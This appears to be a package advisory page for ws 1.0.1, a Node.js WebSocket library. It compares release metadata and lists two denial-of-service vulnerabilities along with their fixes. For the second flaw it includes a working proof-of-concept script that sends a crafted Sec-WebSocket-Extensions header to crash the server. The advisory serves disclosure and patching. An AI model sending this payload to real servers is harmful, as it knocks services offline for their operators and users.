Ws, a popular and performant WebSocket library for Node.js, saw a minor version increment from 1.0.0 to 1.0.1, released on January 4, 2016. While the core functionalities described remain consistent – offering a simple, fast, and well-tested WebSocket solution aligned with RFC-6455 - examining the metadata reveals subtle improvements and points of interest for developers.
The dependency lists for both versions are identical, relying on "ultron" for managing event listeners and "options" for configuration. The development dependencies also remain unchanged, utilizing tools like "mocha," "should," and "expect.js" for testing, and "benchmark" for performance analysis. "bufferutil" and "utf-8-validate" are crucial for efficient and secure WebSocket frame handling, hinting at a focus on performance and security within the library.
The key difference lies in the "releaseDate," with version 1.0.1 being released approximately 5 days after 1.0.0. This suggests that version 1.0.1 is likely a patch release, addressing minor bugs, optimizations, or security concerns identified in the initial 1.0.0 version. While specific details of these changes aren't available in the provided data, developers should prefer the latest version (1.0.1) to benefit from these improvements and ensure a more stable and secure WebSocket implementation for their applications. Upgrading is recommended to leverage any bug fixes or minor enhancements added in this iterative release.
All the vulnerabilities related to the version 1.0.1 of the package
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Update to version 3.3.1 or later.